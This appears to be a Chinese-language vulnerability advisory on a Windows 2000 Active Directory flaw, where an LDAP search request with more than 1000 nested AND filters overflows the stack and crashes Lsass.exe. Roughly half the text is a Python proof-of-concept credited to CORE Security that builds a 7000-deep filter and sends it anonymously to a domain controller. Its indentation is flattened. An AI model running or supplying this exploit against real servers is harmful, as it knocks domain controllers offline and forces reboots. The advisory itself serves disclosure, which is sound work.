涉及程序： Win2k Active Directory 描述： Microsoft Windows 活動(dòng)目錄遠(yuǎn)程堆棧溢出缺陷 詳細(xì)： Windows Active Directory(活動(dòng)目錄)是Windows 2000結(jié)構(gòu)的重要組件，是Microsoft提供的強(qiáng)大的目錄服務(wù)系統(tǒng)。

Windows活動(dòng)目錄的LDAP 3搜索請(qǐng)求功能對(duì)用戶提交請(qǐng)求缺少正確緩沖區(qū)邊界檢查，遠(yuǎn)程攻擊者可利用此缺陷使Lsass.exe服務(wù)崩潰，觸發(fā)緩沖區(qū)溢出。

通過(guò)活動(dòng)目錄提供的目錄服務(wù)基于LDAP協(xié)議和并使用協(xié)議存儲(chǔ)和獲得Active目錄對(duì)象。活動(dòng)目錄中使用LDAP 3的'search request'請(qǐng)求功能存在問(wèn)題，攻擊者如果構(gòu)建超過(guò)1000個(gè)"AND"的請(qǐng)求，并發(fā)送給服務(wù)器，可導(dǎo)致觸發(fā)堆棧溢出，使Lsass.exe服務(wù)崩潰，系統(tǒng)會(huì)在30秒內(nèi)重新啟動(dòng)。

攻擊方法： CORE Security TechnologIEs Advisories （advisories@coresecurity.com）提供了如下測(cè)試方法：

下面是一段Python測(cè)試腳本：

------------------------------------ class ActiveDirectoryDos( Ldap ):

def __init__(self): self._s = None self.host = '192.168.0.1' self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com' self.port = 389 self.buffer = '' self.msg_id = 1 Ldap.__init__()

def generateFilter_BinaryOp( self, filter ): filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode() filterBuffer = self.encapsulateHeader( filter[0], filterBuffer ) return filterBuffer

def generateFilter_RecursiveBinaryOp( self, filter, numTimes): simpleBinOp = self.generateFilter_BinaryOp( filter ) filterBuffer = simpleBinOp for cnt in range( 0, numTimes ): filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp ) return filterBuffer

def searchSub( self, filterBuffer ):

self.bindRequest() self.searchRequest( filterBuffer )

def run(self, host = '', basedn = '', name = '' ):

# the Machine must not exist machine_name = 'xaxax'

filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

# execute the anonymous query print 'executing query' filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 ) self.searchSub( filterBuffer )